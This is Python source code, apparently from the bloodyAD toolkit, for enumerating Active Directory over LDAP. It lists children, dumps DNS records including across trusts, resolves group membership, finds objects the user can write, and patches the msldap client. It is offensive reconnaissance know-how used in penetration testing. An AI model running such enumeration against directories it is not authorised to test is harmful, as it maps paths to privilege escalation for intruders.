from bloodyAD import utils, asciitree
from bloodyAD.exceptions import LOG
from bloodyAD.network.ldap import Scope
from bloodyAD.exceptions import NoResultError
from bloodyAD.formatters import common
from msldap.commons.exceptions import LDAPSearchException
from typing import Literal
import re, asyncio


def children(conn, target: str = "DOMAIN", otype: str = "*", direct: bool = False):
    """
    List children for a given target object

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param otype: special keyword "useronly" or objectClass of objects to fetch e.g. user, computer, group, trustedDomain, organizationalUnit, container, groupPolicyContainer, msDS-GroupManagedServiceAccount, etc
    :param direct: Fetch only direct children of target
    """
    if target == "DOMAIN":
        target = conn.ldap.domainNC
    scope = Scope.LEVEL if direct else Scope.SUBTREE
    if otype == "useronly":
        otype_filter = "sAMAccountType=805306368"
    else:
        otype_filter = f"objectClass={otype}"
    return conn.ldap.bloodysearch(
        target,
        f"(&({otype_filter})(!(distinguishedName={target})))",
        search_scope=scope,
        attr=["distinguishedName"],
    )


def dnsDump(conn, zone: str = None, no_detail: bool = False, transitive: bool = False):
    """
    Retrieve DNS records of the Active Directory readable/listable by the user

    :param zone: if set, prints only records in this zone
    :param no_detail: if set doesn't include system records such as _ldap, _kerberos, @, etc
    :param transitive: if set, try to fetch dns records in AD trusts (you should start from a DC of your user domain to have exhaustive results)
    """

    def domainDnsDump(conn, zone=None, no_detail=False):
        entries = None
        filter = "(|(objectClass=dnsNode)(objectClass=dnsZone))"
        prefix_blacklist = [
            "gc",
            "_gc.*",
            "_kerberos.*",
            "_kpasswd.*",
            "_ldap.*",
            "_msdcs",
            "@",
            "DomainDnsZones",
            "ForestDnsZones",
        ]
        suffix_blacklist = ["RootDNSServers", "..TrustAnchors"]

        if no_detail:
            prefix_filter = ""
            for prefix in prefix_blacklist:
                prefix_filter += f"(!(name={prefix}))"
            filter = f"(&{filter}{prefix_filter})"

        dnsZones = []
        for nc in conn.ldap.appNCs + [conn.ldap.domainNC]:
            try:
                entries = conn.ldap.bloodysearch(
                    nc,
                    filter,
                    search_scope=Scope.SUBTREE,
                    attr=["dnsRecord", "name", "objectClass"],
                )
                for entry in entries:
                    domain_suffix = entry["distinguishedName"].split(",")[1]
                    domain_suffix = domain_suffix.split("=")[1]

                    # RootDNSServers and ..TrustAnchors are system records not interesting for offensive normally
                    if domain_suffix in suffix_blacklist:
                        continue

                    if zone and zone not in domain_suffix:
                        continue

                    # We keep dnsZone to list their children later
                    # Useful if we have list_child on it but no read_prop on the child record
                    if "dnsZone" in entry["objectClass"]:
                        dnsZones.append(entry["distinguishedName"])
                        if entry["name"] not in suffix_blacklist:
                            yield {"zoneName": entry["name"]}
                        continue

                    domain_name = entry["name"]

                    if domain_name == "@":  # @ is for dnsZone info
                        domain_name = domain_suffix
                    else:  # even for reverse lookup (X.X.X.X.in-addr.arpa), domain suffix should be the parent name?
                        if (
                            domain_name[-1] != "."
                        ):  # Then it's probably not a fqdn, suffix needed
                            domain_name = domain_name + "." + domain_suffix

                    ip_addr = domain_name.split(".in-addr.arpa")
                    if len(ip_addr) > 1:
                        decimals = ip_addr[0].split(".")
                        decimals.reverse()
                        while len(decimals) < 4:
                            decimals.append("0")
                        domain_name = ".".join(decimals)

                    yield_entry = {"recordName": domain_name}

                    for record in entry.get("dnsRecord", []):
                        try:
                            if record["Type"] not in yield_entry:
                                yield_entry[record["Type"]] = []
                            if record["Type"] in [
                                "A",
                                "AAAA",
                                "NS",
                                "CNAME",
                                "PTR",
                                "TXT",
                            ]:
                                yield_entry[record["Type"]].append(record["Data"])
                            elif record["Type"] == "MX":
                                yield_entry[record["Type"]].append(
                                    record["Data"]["Name"]
                                )
                            elif record["Type"] == "SRV":
                                yield_entry[record["Type"]].append(
                                    f"{record['Data']['Target']}:{record['Data']['Port']}"
                                )
                            elif record["Type"] == "SOA":
                                yield_entry[record["Type"]].append(
                                    {
                                        "PrimaryServer": record["Data"][
                                            "PrimaryServer"
                                        ],
                                        "zoneAdminEmail": record["Data"][
                                            "zoneAdminEmail"
                                        ].replace(".", "@", 1),
                                    }
                                )
                        except KeyError:
                            LOG.error("[-] KeyError for record: " + record)
                            continue

                    yield yield_entry
            except (NoResultError, LDAPSearchException) as e:
                if type(e) is NoResultError:
                    LOG.warning(f"[!] No readable record found in {nc}")
                else:
                    LOG.warning(f"[!] {nc} couldn't be read on {conn.conf.host}")
                continue
        # List record names if we have list child right on dnsZone or MicrosoftDNS container but no READ_PROP on record object
        for nc in conn.ldap.appNCs:
            dnsZones.append(f"CN=MicrosoftDNS,{nc}")
        dnsZones.append(f"CN=MicrosoftDNS,CN=System,{conn.ldap.domainNC}")
        for searchbase in dnsZones:
            try:
                entries = conn.ldap.bloodysearch(
                    searchbase,
                    "(objectClass=*)",
                    search_scope=Scope.SUBTREE,
                    attr=["objectClass"],
                )
                for entry in entries:
                    # If we can get objectClass it means we have a READ_PROP on the record object so we already found it before
                    if (
                        entry.get("objectClass")
                        or entry["distinguishedName"] == searchbase
                    ):
                        continue

                    domain_parts = entry["distinguishedName"].split(",")
                    domain_suffix = domain_parts[1].split("=")[1]

                    domain_name = domain_parts[0].split("=")[1]
                    if no_detail and re.match("|".join(prefix_blacklist), domain_name):
                        continue

                    if domain_name[-1] != "." and domain_suffix != "MicrosoftDNS":
                        # Then it's probably not a fqdn, suffix certainly needed
                        domain_name = f"{domain_name}.{domain_suffix}"

                    ip_addr = domain_name.split(".in-addr.arpa")
                    if len(ip_addr) > 1:
                        decimals = ip_addr[0].split(".")
                        decimals.reverse()
                        while len(decimals) < 4:
                            decimals.append("0")
                        domain_name = ".".join(decimals)

                    yield {"recordName": domain_name}
            except (NoResultError, LDAPSearchException) as e:
                if type(e) is NoResultError:
                    LOG.warning(f"[!] No listable record found in {nc}")
                else:
                    LOG.warning(f"[!] {nc} couldn't be read on {conn.conf.host}")
                continue

    # Used to avoid duplicate entries if there is the same record in multiple partitions
    record_dict = {}
    record_entries = []
    if transitive:
        trustmap = conn.ldap.getTrustMap()
        for trust in trustmap.values():
            if "conn" in trust:
                record_entries.append(domainDnsDump(trust["conn"], zone, no_detail))
    else:
        record_entries.append(domainDnsDump(conn, zone, no_detail))

    basic_records = []
    for records in record_entries:
        for r in records:
            keyName = "recordName" if "recordName" in r else "zoneName"
            # If it's a record with only the record name returns it later and only if we didn't find another record with more info
            if len(r) == 1 and keyName == "recordName":
                basic_records.append(r)
                continue
            yield_r = {}

            rname = r[keyName]
            if rname in record_dict:
                for r_type in r:
                    if r_type == keyName:
                        continue
                    if record_dict[rname].get(r_type):
                        if r[r_type] in record_dict[rname][r_type]:
                            continue
                    else:
                        record_dict[rname][r_type] = []
                    yield_r[r_type] = r[r_type]
                    record_dict[rname][r_type].append(r[r_type])
                if not yield_r:
                    continue
            else:
                yield_r = r
                record_dict[rname] = {}
                for k, v in r.items():
                    record_dict[rname][k] = [v]

            yield_r[keyName] = rname

            yield yield_r

    for basic_r in basic_records:
        if basic_r["recordName"] in record_dict:
            continue
        yield basic_r


def membership(conn, target: str, no_recurse: bool = False):
    """
    Retrieve SID and SAM Account Names of all groups a target belongs to

    :param target: sAMAccountName, DN, GUID or SID of the target
    :param no_recurse: if set, doesn't retrieve groups where target isn't a direct member
    """
    ldap_filter = ""
    if no_recurse:
        entries = conn.ldap.bloodysearch(target, attr=["objectSid", "memberOf"])
        for entry in entries:
            for group in entry.get("memberOf", []):
                ldap_filter += f"(distinguishedName={group})"
        if not ldap_filter:
            LOG.warning("[!] No direct group membership found")
            return []
    else:
        # [MS-ADTS] 3.1.1.4.5.19 tokenGroups, tokenGroupsNoGCAcceptable
        attr = "tokenGroups"
        entries = conn.ldap.bloodysearch(target, attr=[attr])
        for entry in entries:
            try:
                for groupSID in entry[attr]:
                    ldap_filter += f"(objectSID={groupSID})"
            except KeyError:
                LOG.warning("[!] No membership found")
                return []
        if not ldap_filter:
            LOG.warning("no GC Server available, the set of groups might be incomplete")
            attr = "tokenGroupsNoGCAcceptable"
            entries = conn.ldap.bloodysearch(target, attr=[attr])
            for entry in entries:
                for groupSID in entry[attr]:
                    ldap_filter += f"(objectSID={groupSID})"

    entries = conn.ldap.bloodysearch(
        conn.ldap.domainNC,
        f"(|{ldap_filter})",
        search_scope=Scope.SUBTREE,
        attr=["objectSID", "sAMAccountName"],
    )
    return entries


def trusts(conn, transitive: bool = False):
    """
    Display trusts in an ascii tree starting from the DC domain as tree root. A->B means A can auth on B and A-<B means B can auth on A, A-<>B means bidirectional

    :param transitive: Try to fetch transitive trusts (you should start from a dc of your user domain to have more complete results)
    """

    trust_dict = asyncio.get_event_loop().run_until_complete(
        conn.ldap.getTrusts(transitive, conn.conf.dns)
    )

    # Get the host domain as root for the trust tree
    trust_root_domain = (".".join(conn.ldap.domainNC.split(",DC="))).split("DC=")[1]
    if trust_dict:
        tree = {}
        asciitree.branchFactory({":" + trust_root_domain: tree}, [], trust_dict)
        tree_printer = asciitree.LeftAligned()
        print(tree_printer({trust_root_domain: tree}))


def object(
    conn, target: str, attr: str = "*", resolve_sd: bool = False, raw: bool = False
):
    """
    Retrieve LDAP attributes for the target object provided, binary data will be outputted in base64

    :param target: sAMAccountName, DN, GUID or SID of the target (if you give an empty string "" prints rootDSE)
    :param attr: attributes to retrieve separated by a comma, retrieves all the attributes by default
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved (see bloodyAD github wiki/Access-Control for more information)
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputted in base64
    """
    attributesSD = [
        "nTSecurityDescriptor",
        "msDS-GroupMSAMembership",
        "msDS-AllowedToActOnBehalfOfOtherIdentity",
    ]
    entries = conn.ldap.bloodysearch(target, attr=attr.split(","), raw=raw)
    rendered_entries = utils.renderSearchResult(entries)
    if resolve_sd and not raw:
        for entry in rendered_entries:
            for attrSD in attributesSD:
                if attrSD in entry:
                    e = entry[attrSD]
                    if not isinstance(e, list):
                        entry[attrSD] = utils.renderSD(e, conn)
                    else:
                        entry[attrSD] = [utils.renderSD(sd, conn) for sd in e]
            yield entry
    else:
        yield from rendered_entries


def search(
    conn,
    base: str = "DOMAIN",
    filter: str = "(objectClass=*)",
    attr: str = "*",
    resolve_sd: bool = False,
    raw: bool = False,
):
    """
    Search in LDAP database, binary data will be outputted in base64

    :param base: DN of the parent object
    :param filter: filter to apply to the LDAP search (see Microsoft LDAP filter syntax)
    :param attr: attributes to retrieve separated by a comma
    :param resolve_sd: if set, permissions linked to a security descriptor will be resolved (see bloodyAD github wiki/Access-Control for more information)
    :param raw: if set, will return attributes as sent by the server without any formatting, binary data will be outputed in base64
    """
    attributesSD = [
        "nTSecurityDescriptor",
        "msDS-GroupMSAMembership",
        "msDS-AllowedToActOnBehalfOfOtherIdentity",
    ]
    if base == "DOMAIN":
        base = conn.ldap.domainNC
    entries = conn.ldap.bloodysearch(
        base, filter, search_scope=Scope.SUBTREE, attr=attr.split(","), raw=raw
    )
    rendered_entries = utils.renderSearchResult(entries)
    if resolve_sd and not raw:
        for entry in rendered_entries:
            for attrSD in attributesSD:
                if attrSD in entry:
                    e = entry[attrSD]
                    if not isinstance(e, list):
                        entry[attrSD] = utils.renderSD(e, conn)
                    else:
                        entry[attrSD] = [utils.renderSD(sd, conn) for sd in e]
            yield entry
    else:
        yield from rendered_entries


# TODO: Search writable for application partitions too?
def writable(
    conn,
    otype: Literal["ALL", "OU", "USER", "COMPUTER", "GROUP", "DOMAIN", "GPO"] = "ALL",
    right: Literal["ALL", "WRITE", "CHILD"] = "ALL",
    detail: bool = False,
    # partition: Literal["DOMAIN", "DNS", "ALL"] = "DOMAIN"
):
    """
    Retrieve objects writable by client

    :param otype: type of writable object to retrieve
    :param right: type of right to search
    :param detail: if set, displays attributes/object types you can write/create for the object
    """
    # :param partition: directory partition a.k.a naming context to explore

    ldap_filter = ""
    if otype == "USER":
        ldap_filter = "(sAMAccountType=805306368)"
    else:
        if otype == "ALL":
            objectClass = "*"
        elif otype == "OU":
            objectClass = "container"
        elif otype == "GPO":
            objectClass = "groupPolicyContainer"
        else:
            objectClass = otype
        ldap_filter = f"(objectClass={objectClass})"

    attr_params = {}
    genericReturn = (
        (lambda a: [b for b in a])
        if detail
        else (lambda a: ["permission"] if a else [])
    )
    if right == "WRITE" or right == "ALL":
        attr_params["allowedAttributesEffective"] = {
            "lambda": genericReturn,
            "right": "WRITE",
        }

        def testSDRights(a):  # Mask defined in MS-ADTS for allowedAttributesEffective
            r = []
            if not a:
                return r
            if a & 3:
                r.append("OWNER")
            if a & 4:
                r.append("DACL")
            if a & 8:
                r.append("SACL")
            return r

        attr_params["sDRightsEffective"] = {"lambda": testSDRights, "right": "WRITE"}
    if right == "CHILD" or right == "ALL":
        attr_params["allowedChildClassesEffective"] = {
            "lambda": genericReturn,
            "right": "CREATE_CHILD",
        }

    searchbases = []
    # if partition == "DOMAIN":
    searchbases.append(conn.ldap.domainNC)
    # elif partition == "DNS":
    #     searchbases.append(conn.ldap.applicationNCs) # A definir https://learn.microsoft.com/en-us/windows/win32/ad/enumerating-application-directory-partitions-in-a-forest
    # else:
    #     searchbases.append(conn.ldap.NCs) # A definir
    right_entry = {}
    for searchbase in searchbases:
        for entry in conn.ldap.bloodysearch(
            searchbase, ldap_filter, search_scope=Scope.SUBTREE, attr=attr_params.keys()
        ):
            for attr_name in entry:
                if attr_name not in attr_params:
                    continue
                key_names = attr_params[attr_name]["lambda"](entry[attr_name])
                for name in key_names:
                    if name == "distinguishedName":
                        name = "dn"
                    if name not in right_entry:
                        right_entry[name] = []
                    right_entry[name].append(attr_params[attr_name]["right"])

            if right_entry:
                yield {
                    **{"distinguishedName": entry["distinguishedName"]},
                    **right_entry,
                }
                right_entry = {}



from msldap.client import MSLDAPClient
from msldap import logger
from typing import List, Tuple, Dict
from msldap.commons.common import MSLDAPClientStatus
from msldap.protocol.messages import Control


async def clientPagedsearch(
    self,
    query: str,
    attributes: List[str],
    controls: List[Tuple[str, str, str]] = None,
    tree: str = None,
    search_scope: int = 2,
    raw: bool = False,
):
    """
    Performs a paged search on the AD, using the filter and attributes as a normal query does.
        !The LDAP connection MUST be active before invoking this function!

    :param query: LDAP query filter
    :type query: str
    :param attributes: List of requested attributes
    :type attributes: List[str]
    :param controls: additional controls to be passed in the query
    :type controls: dict
    :param tree: Base tree to perform the search on
    :type tree: str
    :param search_scope: LDAP search scope
    :type search_scope: int
    :param raw: Return the attributes without conversion
    :type raw: bool

    :return: Async generator which yields (`dict`, None) tuple on success or (None, `Exception`) on error
    :rtype: Iterator[(:class:`dict`, :class:`Exception`)]

    """
    logger.debug(
        "Paged search, filter: %s attributes: %s" % (query, ",".join(attributes))
    )
    if self._con.status != MSLDAPClientStatus.RUNNING:
        if self._con.status == MSLDAPClientStatus.ERROR:
            print("There was an error in the connection!")
            return

    if tree is None:
        tree = self._tree
    if tree is None:
        raise Exception("BIND first!")
    t = []
    for x in attributes:
        t.append(x.encode())
    attributes = t

    t = []
    if controls is not None:
        for control in controls:
            t.append(
                Control(
                    {
                        "controlType": control[0].encode(),
                        "criticality": control[1],
                        "controlValue": control[2],
                    }
                )
            )

    controls = t

    async for entry, err in self._con.pagedsearch(
        tree,
        query,
        attributes=attributes,
        size_limit=self.ldap_query_page_size,
        controls=controls,
        rate_limit=self.ldap_query_ratelimit,
        search_scope=search_scope,
        raw=raw,
    ):

        if err is not None:
            yield None, err
            return
        if entry["objectName"] == "" and entry["attributes"] == "":
            # searchresref...
            continue
        # print('et %s ' % entry)
        yield entry, None


MSLDAPClient.pagedsearch = clientPagedsearch


# MODIFICATIONS:
# Add the encode arg to be able to pass already encoded value directly
async def modify(
    self,
    dn: str,
    changes: Dict[str, object],
    controls: Dict[str, object] = None,
    encode=True,
):
    """
            Performs the modify operation.

            :param dn: The DN of the object whose attributes are to be modified
            :type dn: str
            :param changes: Describes the changes to be made on the object. Must be a dictionary of the following format: {'attribute': [('change_type', [value])]}
            :type changes: dict
            :param controls: additional controls to be passed in the query
            :type controls: dict
    :param encode: encode the changes provided before sending them to the server
    :type encode: bool
            :return: A tuple of (True, None) on success or (False, Exception) on error.
            :rtype: (:class:`bool`, :class:`Exception`)
    """
    if controls is None:
        controls = []
    controls_conv = []
    for control in controls:
        controls_conv.append(Control(control))
    return await self._con.modify(dn, changes, controls=controls_conv, encode=encode)


MSLDAPClient.modify = modify


import asyncio
from msldap.protocol.messages import (
    LDAPMessage,
    BindRequest,
    protocolOp,
    AuthenticationChoice,
    SaslCredentials,
    SearchRequest,
    AttributeDescription,
    Filter,
    Filters,
    Controls,
    Control,
    SearchControlValue,
    AddRequest,
    ModifyRequest,
    DelRequest,
    ExtendedRequest,
    ExtendedResponse,
)
from msldap.commons.exceptions import (
    LDAPBindException,
    LDAPAddException,
    LDAPModifyException,
    LDAPDeleteException,
    LDAPSearchException,
)
from msldap.connection import MSLDAPClientConnection
from msldap.protocol.typeconversion import (
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES,
    LDAP_WELL_KNOWN_ATTRS,
)


def convert_attributes(x, raw=False):
    t = {}
    for e in x:
        # print(e)
        k = e["type"].decode()
        # print('k: %s' % k)
        if raw:
            t[k] = e["attributes"]
        else:
            if k in MSLDAP_BUILTIN_ATTRIBUTE_TYPES:
                t[k] = MSLDAP_BUILTIN_ATTRIBUTE_TYPES[k](e["attributes"], False)
            elif k in LDAP_WELL_KNOWN_ATTRS:
                t[k] = LDAP_WELL_KNOWN_ATTRS[k](e["attributes"], False)
            else:
                logger.debug("Unknown type! %s data: %s" % (k, e["attributes"]))
                t[k] = e["attributes"]
    return t


def convert_result(x, raw=False):
    # print(x)
    # import traceback
    # traceback.print_stack()
    return {
        "objectName": x["objectName"].decode(),
        "attributes": convert_attributes(x["attributes"], raw),
    }


async def pagedsearch(
    self,
    base: str,
    query: str,
    attributes: List[str],
    search_scope: int = 2,
    size_limit: int = 1000,
    typesOnly: bool = False,
    derefAliases: bool = 0,
    timeLimit: int = None,
    controls: List[Control] = None,
    rate_limit: int = 0,
    raw: bool = False,
):
    """
    Paged search is the same as the search operation and uses it under the hood. Adds automatic control to read all results in a paged manner.

    :param base: base tree on which the search should be performed
    :type base: str
    :param query: filter query that defines what should be searched for
    :type query: str
    :param attributes: a list of attributes to be included in the response
    :type attributes: List[str]
    :param search_scope: Specifies the search operation's scope. Default: 2 (Subtree)
    :type search_scope: int
    :param types_only: indicates whether the entries returned should include attribute types only or both types and values. Default: False (both)
    :type types_only: bool
    :param size_limit: Size limit of result elements per query. Default: 1000
    :type size_limit: int
    :param derefAliases: Specifies the behavior on how aliases are dereferenced. Default: 0 (never)
    :type derefAliases: int
    :param timeLimit: Maximum time the search should take. If time limit reached the server SHOULD return an error
    :type timeLimit: int
    :param controls: additional controls to be passed in the query
    :type controls: dict
    :param rate_limit: time to sleep bwetween each query
    :type rate_limit: float
    :param raw: Return the attributes without conversion
    :type raw: bool

    :return: Async generator which yields (`dict`, None) tuple on success or (None, `Exception`) on error
    :rtype: Iterator[(:class:`dict`, :class:`Exception`)]
    """

    if self.status != MSLDAPClientStatus.RUNNING:
        yield None, Exception("Connection not running! Probably encountered an error")
        return
    try:
        cookie = b""
        while True:
            await asyncio.sleep(rate_limit)
            ctrl_list_temp = [
                Control(
                    {
                        "controlType": b"1.2.840.113556.1.4.319",
                        "controlValue": SearchControlValue(
                            {"size": size_limit, "cookie": cookie}
                        ).dump(),
                    }
                )
            ]
            if controls is not None:
                ctrl_list_temp.extend(controls)

            ctrs = Controls(ctrl_list_temp)

            async for res, err in self.search(
                base,
                query,
                attributes,
                search_scope=search_scope,
                size_limit=size_limit,
                types_only=typesOnly,
                derefAliases=derefAliases,
                timeLimit=timeLimit,
                controls=ctrs,
                return_done=True,
            ):
                if err is not None:
                    yield (None, err)
                    return

                if "resultCode" in res["protocolOp"]:
                    if res["protocolOp"]["resultCode"] != "success":
                        raise LDAPSearchException(
                            res["protocolOp"]["resultCode"],
                            res["protocolOp"]["diagnosticMessage"],
                        )
                    try:
                        for control in res["controls"]:
                            if control["controlType"] == b"1.2.840.113556.1.4.319":
                                try:
                                    cookie = SearchControlValue.load(
                                        control["controlValue"]
                                    ).native["cookie"]
                                except Exception as e:
                                    raise e
                                break
                    except TypeError:
                        pass
                        # Is it really important that SearchControl is missing?
                        # raise Exception("SearchControl missing from server response!")
                else:
                    yield (convert_result(res["protocolOp"], raw), None)

            if cookie == b"":
                break

    except Exception as e:
        yield (None, e)


MSLDAPClientConnection.pagedsearch = pagedsearch

from msldap.protocol.typeconversion import (
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC,
    MSLDAP_BUILTIN_ATTRIBUTE_TYPES,
    LDAP_WELL_KNOWN_ATTRS,
    multi_bytes,
    single_bytes,
)
from msldap.protocol.messages import Attribute, Change, PartialAttribute


# MODIFICATIONS:
# Replacing all single by multi because we doesn't need to ensure only one change has been provided for single attributes, the server will tell it for us.
# Handle raw changes values with encode param
def encode_changes(x, encode=True):
    logger.debug("Encode changes: %s" % x)
    res = []
    for k in x:
        lookup_table = None
        if k in MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC:
            lookup_table = MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC
        elif k in MSLDAP_BUILTIN_ATTRIBUTE_TYPES:
            lookup_table = MSLDAP_BUILTIN_ATTRIBUTE_TYPES
        elif k in LDAP_WELL_KNOWN_ATTRS:
            lookup_table = LDAP_WELL_KNOWN_ATTRS
        else:
            raise Exception('Unknown conversion type for key "%s"' % k)

        for mod, value in x[k]:
            encoder = lookup_table[k]
            splitted_name = encoder.__name__.split("_")
            if isinstance(value, list) and "single" == splitted_name[0]:
                if len(value) > 1:
                    raise TypeError(
                        f"{k} takes only one value but multiple values have been given."
                    )
                value = value[0]
            if not encode and splitted_name[1] != ["bytes"]:
                if splitted_name[0] == "single":
                    encoder = single_bytes
                else:
                    encoder = multi_bytes
            res.append(
                Change(
                    {
                        "operation": mod,
                        "modification": PartialAttribute(
                            {"type": k.encode(), "attributes": encoder(value, True)}
                        ),
                    }
                )
            )
            # print(lookup_table[k](value, True))
    return res


# MODIFICATIONS:
# Add the encode arg to be able to pass already encoded value directly
async def modify(
    self,
    entry: str,
    changes: Dict[str, object],
    controls: List[Control] = None,
    encode=True,
):
    """
    Performs the modify operation.

    :param entry: The DN of the object whose attributes are to be modified
    :type entry: str
    :param changes: Describes the changes to be made on the object. Must be a dictionary of the following format: {'attribute': [('change_type', [value])]}
    :type changes: dict
    :param controls: additional controls to be passed in the query
    :type controls: List[class:`Control`]
    :param encode: encode the changes provided before sending them to the server
    :type encode: bool
    :return: A tuple of (True, None) on success or (False, Exception) on error.
    :rtype: (:class:`bool`, :class:`Exception`)
    """
    try:
        req = {"object": entry.encode(), "changes": encode_changes(changes, encode)}
        br = {"modifyRequest": ModifyRequest(req)}
        msg = {"protocolOp": protocolOp(br)}
        if controls is not None:
            msg["controls"] = controls

        msg_id = await self.send_message(msg)
        results = await self.recv_message(msg_id)
        if isinstance(results[0], Exception):
            return False, results[0]

        for message in results:
            msg_type = message["protocolOp"].name
            message = message.native
            if msg_type == "modifyResponse":
                if message["protocolOp"]["resultCode"] != "success":
                    return False, LDAPModifyException(
                        entry,
                        message["protocolOp"]["resultCode"],
                        message["protocolOp"]["diagnosticMessage"],
                    )

        return True, None
    except Exception as e:
        return False, e


MSLDAPClientConnection.modify = modify


def encode_attributes(x):
    """converts a dict to attributelist"""
    res = []
    for k in x:
        lookup_table = None
        if k in MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC:
            lookup_table = MSLDAP_BUILTIN_ATTRIBUTE_TYPES_ENC
        elif k in MSLDAP_BUILTIN_ATTRIBUTE_TYPES:
            lookup_table = MSLDAP_BUILTIN_ATTRIBUTE_TYPES
        elif k in LDAP_WELL_KNOWN_ATTRS:
            lookup_table = LDAP_WELL_KNOWN_ATTRS
        else:
            raise Exception('Unknown conversion type for key "%s"' % k)

        res.append(
            Attribute({"type": k.encode(), "attributes": lookup_table[k](x[k], True)})
        )

    return res


async def add(self, entry: str, attributes: Dict[str, object]):
    """
    Performs the add operation.

    :param entry: The DN of the object to be added
    :type entry: str
    :param attributes: Attributes to be used in the operation
    :type attributes: dict
    :return: A tuple of (True, None) on success or (False, Exception) on error.
    :rtype: (:class:`bool`, :class:`Exception`)
    """
    try:
        req = {"entry": entry.encode(), "attributes": encode_attributes(attributes)}
        logger.debug(req)
        br = {"addRequest": AddRequest(req)}
        msg = {"protocolOp": protocolOp(br)}

        msg_id = await self.send_message(msg)
        results = await self.recv_message(msg_id)
        if isinstance(results[0], Exception):
            return False, results[0]

        for message in results:
            msg_type = message["protocolOp"].name
            message = message.native
            if msg_type == "addResponse":
                if message["protocolOp"]["resultCode"] != "success":
                    return False, LDAPAddException(
                        entry,
                        message["protocolOp"]["resultCode"],
                        message["protocolOp"]["diagnosticMessage"],
                    )

        return True, None
    except Exception as e:
        return False, e


MSLDAPClientConnection.add = add

# MODIFICATIONS:
### Parse url with encoding for special chars ###
from asysocks.unicomm.common.target import UniTarget, UniProto
from urllib.parse import urlparse
from msldap.commons.target import MSLDAPTarget
from asysocks.unicomm.utils.paramprocessor import str_one, int_one, bool_one

msldaptarget_url_params = {
    "pagesize": int_one,
    "rate": int_one,
}

from urllib import parse


def from_url(connection_url):
    url_e = urlparse(connection_url)
    url_dict = url_e._asdict()
    for prop, val in url_dict.items():
        if type(val) is str:
            url_dict[prop] = parse.unquote(val)
    url_e = url_e._replace(**url_dict)
    schemes = []
    for item in url_e.scheme.upper().split("+"):
        schemes.append(item.replace("-", "_"))
    if schemes[0] == "LDAP":
        protocol = UniProto.CLIENT_TCP
        port = 389
    elif schemes[0] == "LDAPS":
        protocol = UniProto.CLIENT_SSL_TCP
        port = 636
    elif schemes[0] == "LDAP_SSL":
        protocol = UniProto.CLIENT_SSL_TCP
        port = 636
    elif schemes[0] == "LDAP_TCP":
        protocol = UniProto.CLIENT_TCP
        port = 389
    elif schemes[0] == "LDAP_UDP":
        raise NotImplementedError()
        protocol = UniProto.CLIENT_UDP
        port = 389
    elif schemes[0] == "GC":
        protocol = UniProto.CLIENT_TCP
        port = 3268
    elif schemes[0] == "GC_SSL":
        protocol = UniProto.CLIENT_SSL_TCP
        port = 3269
    else:
        raise Exception("Unknown protocol! %s" % schemes[0])

    if url_e.port:
        port = url_e.port
    if port is None:
        raise Exception("Port must be provided!")

    path = None
    if url_e.path not in ["/", "", None]:
        path = url_e.path

    unitarget, extraparams = UniTarget.from_url(
        connection_url, protocol, port, msldaptarget_url_params
    )
    pagesize = extraparams["pagesize"] if extraparams["pagesize"] is not None else 1000
    rate = extraparams["rate"] if extraparams["rate"] is not None else 0

    target = MSLDAPTarget(
        unitarget.ip,
        port=unitarget.port,
        protocol=unitarget.protocol,
        tree=path,
        proxies=unitarget.proxies,
        timeout=unitarget.timeout,
        ldap_query_page_size=pagesize,
        ldap_query_ratelimit=rate,
        dns=unitarget.dns,
        dc_ip=unitarget.dc_ip,
        domain=unitarget.domain,
        hostname=unitarget.hostname,
        ssl_ctx=unitarget.ssl_ctx,
    )
    return target


MSLDAPTarget.from_url = from_url


from urllib.parse import urlparse, parse_qs
from asyauth.common.constants import asyauthSecret, asyauthProtocol, asyauthSubProtocol
from asyauth.common.subprotocols import SubProtocol, SubProtocolNative
from asyauth.common.credentials import UniCredential

from urllib import parse


def from_url(connection_url):
    from asysocks.unicomm.common.target import UniTarget, UniProto

    secret = None
    username = None
    domain = None
    stype = asyauthSecret.NONE
    protocol = asyauthProtocol.NONE
    subprotocol = SubProtocolNative()
    url_e = urlparse(connection_url)
    url_dict = url_e._asdict()
    for prop, val in url_dict.items():
        if type(val) is str:
            url_dict[prop] = parse.unquote(val)
    url_e = url_e._replace(**url_dict)
    schemes = url_e.scheme.upper().split("+")
    if len(schemes) == 1:
        try:
            protocol = asyauthProtocol(schemes)
        except:
            pass
    else:
        auth_tags = schemes[1].replace("-", "_")
        try:
            protocol = asyauthProtocol(auth_tags)
        except:
            auth_tags = schemes[1].split("-")
            if len(auth_tags) > 1:
                try:
                    spt = asyauthSubProtocol(auth_tags[0])
                except:
                    protocol = asyauthProtocol(auth_tags[0])
                    stype = asyauthSecret(auth_tags[1])
                else:
                    protocol = asyauthProtocol(auth_tags[1])
                    query = None
                    if url_e.query is not None:
                        query = parse_qs(url_e.query)
                    subprotocol = SubProtocol.from_url_params(spt, query)

            else:
                try:
                    spt = asyauthSubProtocol(auth_tags[0])
                    protocol = asyauthProtocol.NTLM
                except:
                    protocol = asyauthProtocol(auth_tags[0])

    if url_e.username is not None:
        if url_e.username.find("\\") != -1:
            domain, username = url_e.username.split("\\")
            if domain == ".":
                domain = None
        else:
            domain = None
            username = url_e.username

    secret = url_e.password
    credobj = None
    if protocol == asyauthProtocol.KERBEROS:
        from asyauth.common.credentials.kerberos import KerberosCredential

        credobj = KerberosCredential

    elif protocol in [asyauthProtocol.NTLM, asyauthProtocol.SICILY]:
        from asyauth.common.credentials.ntlm import NTLMCredential

        credobj = NTLMCredential

    extraparams = {}
    if credobj is not None:
        extraparams = credobj.get_url_params()

    paramstemplate = UniCredential.get_url_params()
    params = dict.fromkeys(UniCredential.get_url_params(), None)
    extra = dict.fromkeys(extraparams.keys(), None)
    proxy_present = False
    if url_e.query is not None:
        query = parse_qs(url_e.query)
        for k in query:
            if k.startswith("proxy") is True:
                proxy_present = True
            if k in params:
                params[k] = paramstemplate[k](query[k])
            if k in extraparams:
                extra[k] = extraparams[k](query[k])

    if protocol in [asyauthProtocol.NTLM, asyauthProtocol.SICILY]:
        res = credobj(
            secret,
            username,
            domain,
            stype,
            subprotocol=subprotocol,
        )
        if protocol == asyauthProtocol.SICILY:
            res.protocol = asyauthProtocol.SICILY
        return res

